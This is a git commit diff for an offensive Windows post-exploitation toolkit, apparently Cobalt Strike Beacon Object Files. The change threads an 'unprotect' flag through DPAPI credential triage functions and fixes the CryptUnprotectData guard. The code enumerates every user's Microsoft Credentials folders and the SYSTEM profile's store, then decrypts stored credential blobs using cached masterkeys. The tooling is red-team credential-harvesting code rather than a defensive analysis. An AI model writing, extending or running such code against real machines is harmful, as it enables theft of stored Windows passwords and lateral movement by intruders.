feat: wire unprotect flag through credential triage chain

- Add BOOL unprotect param to describe_credential, triage_cred_file,
  triage_cred_folder, triage_user_creds, triage_system_creds
- Fix CryptUnprotectData guard: was 'unprotect && !cache' (always false
  since cache is never NULL) → now just 'unprotect'
- Update all 4 callers (credentials.c, machinecredentials.c,
  machinetriage.c, triage_user_full) with FALSE default

Author: bhanunamikze

include/dpapi_common.h

@@ -136,6 +136,7 @@ char* get_sid_from_bkfile(const BYTE* bk_bytes, int bk_len);
 /* ---- Credential Parsing ---- */
 BOOL describe_credential(const BYTE* data, int data_len,
                          MASTERKEY_CACHE* cache,
+                         BOOL unprotect,
                          char** output);
 
 BOOL parse_dec_cred_blob(const BYTE* data, int data_len, char** output);

include/triage.h

@@ -25,15 +25,19 @@ BOOL triage_system_masterkeys(MASTERKEY_CACHE* cache);
 /* ---- Credential Triage ---- */
 BOOL triage_user_creds(MASTERKEY_CACHE* cache,
                        const wchar_t* target,
-                       const wchar_t* server);
+                       const wchar_t* server,
+                       BOOL unprotect);
 
-BOOL triage_system_creds(MASTERKEY_CACHE* cache);
+BOOL triage_system_creds(MASTERKEY_CACHE* cache,
+                         BOOL unprotect);
 
 BOOL triage_cred_folder(MASTERKEY_CACHE* cache,
-                        const wchar_t* folder);
+                        const wchar_t* folder,
+                        BOOL unprotect);
 
 BOOL triage_cred_file(MASTERKEY_CACHE* cache,
-                      const wchar_t* file_path);
+                      const wchar_t* file_path,
+                      BOOL unprotect);
 
 /* ---- Vault Triage ---- */
 BOOL triage_user_vaults(MASTERKEY_CACHE* cache,

src/bofs/credentials.c

@@ -83,14 +83,14 @@ void go(char* args, int args_len) {
 #endif
         if (attrs != INVALID_FILE_ATTRIBUTES) {
             if (attrs & FILE_ATTRIBUTE_DIRECTORY) {
-                triage_cred_folder(&cache, target);
+                triage_cred_folder(&cache, target, FALSE);
             } else {
-                triage_cred_file(&cache, target);
+                triage_cred_file(&cache, target, FALSE);
             }
         }
     } else {
         /* Triage all user credential stores */
-        triage_user_creds(&cache, NULL, server);
+        triage_user_creds(&cache, NULL, server, FALSE);
     }
 
     if (cache.count > 0) {

src/bofs/machinecredentials.c

@@ -44,7 +44,7 @@ void go(char* args, int args_len) {
         cache.count);
 
     /* Step 2: Triage SYSTEM credential files */
-    triage_system_creds(&cache);
+    triage_system_creds(&cache, FALSE);
 
     mk_cache_free(&cache);
 }

src/bofs/machinetriage.c

@@ -45,7 +45,7 @@ void go(char* args, int args_len) {
 
     /* Step 2: Triage credentials */
     BeaconPrintf(CALLBACK_OUTPUT, "[*] --- Machine Credentials ---\n");
-    triage_system_creds(&cache);
+    triage_system_creds(&cache, FALSE);
 
     /* Step 3: Triage vaults */
     BeaconPrintf(CALLBACK_OUTPUT, "\n[*] --- Machine Vaults ---\n");

src/common/dpapi.c

@@ -303,7 +303,7 @@ BOOL describe_dpapi_blob(const BYTE* raw, int raw_len,
     }
 
     /* CryptUnprotectData path (for /unprotect flag) */
-    if (unprotect && !cache) {
+    if (unprotect) {
         DATA_BLOB dataIn, dataOut;
         dataIn.pbData = (BYTE*)raw;
         dataIn.cbData = raw_len;
@@ -553,6 +553,7 @@ BOOL derive_pre_key(const char* password, const char* sid,
 
 BOOL describe_credential(const BYTE* data, int data_len,
                          MASTERKEY_CACHE* cache,
+                         BOOL unprotect,
                          char** output) {
     /*
      * Credential file structure:
@@ -575,7 +576,7 @@ BOOL describe_credential(const BYTE* data, int data_len,
     if (blob_offset >= data_len) return FALSE;
 
     return describe_dpapi_blob(data + blob_offset, data_len - blob_offset,
-                               cache, FALSE, output);
+                               cache, unprotect, output);
 }
 
 /* ---- Parse decrypted credential blob ---- */

src/common/triage.c

@@ -464,6 +464,7 @@ BOOL triage_system_masterkeys(MASTERKEY_CACHE* cache) {
 typedef struct {
     MASTERKEY_CACHE* cache;
     int found;
+    BOOL unprotect;
 } CRED_TRIAGE_CTX;
 
 static void triage_cred_file_cb(const wchar_t* path, void* ctx) {
@@ -477,27 +478,28 @@ static void triage_cred_file_cb(const wchar_t* path, void* ctx) {
     BeaconPrintf(CALLBACK_OUTPUT, "\n  CredFile     : %s\n", path_str ? path_str : "?");
     if (path_str) intFree(path_str);
 
-    describe_credential(data, data_len, tc->cache, NULL);
+    describe_credential(data, data_len, tc->cache, tc->unprotect, NULL);
     tc->found++;
 
     intFree(data);
 }
 
-BOOL triage_cred_file(MASTERKEY_CACHE* cache, const wchar_t* file_path) {
-    CRED_TRIAGE_CTX ctx = { cache, 0 };
+BOOL triage_cred_file(MASTERKEY_CACHE* cache, const wchar_t* file_path, BOOL unprotect) {
+    CRED_TRIAGE_CTX ctx = { cache, 0, unprotect };
     triage_cred_file_cb(file_path, &ctx);
     return (ctx.found > 0);
 }
 
-BOOL triage_cred_folder(MASTERKEY_CACHE* cache, const wchar_t* folder) {
-    CRED_TRIAGE_CTX ctx = { cache, 0 };
+BOOL triage_cred_folder(MASTERKEY_CACHE* cache, const wchar_t* folder, BOOL unprotect) {
+    CRED_TRIAGE_CTX ctx = { cache, 0, unprotect };
     enumerate_files(folder, NULL, triage_cred_file_cb, &ctx);
     return (ctx.found > 0);
 }
 
 BOOL triage_user_creds(MASTERKEY_CACHE* cache,
                        const wchar_t* target,
-                       const wchar_t* server) {
+                       const wchar_t* server,
+                       BOOL unprotect) {
     BeaconPrintf(CALLBACK_OUTPUT, "\n[*] Triaging user credentials...\n");
 
     int user_count = 0;
@@ -506,11 +508,11 @@ BOOL triage_user_creds(MASTERKEY_CACHE* cache,
     for (int i = 0; i < user_count; i++) {
         wchar_t cred_path[MAX_PATH * 2];
         swprintf(cred_path, L"%s\\AppData\\Roaming\\Microsoft\\Credentials", users[i]);
-        triage_cred_folder(cache, cred_path);
+        triage_cred_folder(cache, cred_path, unprotect);
 
         /* Also check Local\Credentials */
         swprintf(cred_path, L"%s\\AppData\\Local\\Microsoft\\Credentials", users[i]);
-        triage_cred_folder(cache, cred_path);
+        triage_cred_folder(cache, cred_path, unprotect);
     }
 
     for (int i = 0; i < user_count; i++) intFree(users[i]);
@@ -519,11 +521,11 @@ BOOL triage_user_creds(MASTERKEY_CACHE* cache,
     return TRUE;
 }
 
-BOOL triage_system_creds(MASTERKEY_CACHE* cache) {
+BOOL triage_system_creds(MASTERKEY_CACHE* cache, BOOL unprotect) {
     BeaconPrintf(CALLBACK_OUTPUT, "\n[*] Triaging system credentials...\n");
 
     wchar_t path[] = L"C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Credentials";
-    return triage_cred_folder(cache, path);
+    return triage_cred_folder(cache, path, unprotect);
 }
 
 /* ============================================================
@@ -738,7 +740,7 @@ BOOL triage_user_full(MASTERKEY_CACHE* cache,
     }
 
     BeaconPrintf(CALLBACK_OUTPUT, "\n[*] --- User Credentials ---\n");
-    triage_user_creds(cache, target, server);
+    triage_user_creds(cache, target, server, FALSE);
 
     BeaconPrintf(CALLBACK_OUTPUT, "\n[*] --- User Vaults ---\n");
     triage_user_vaults(cache, target, server);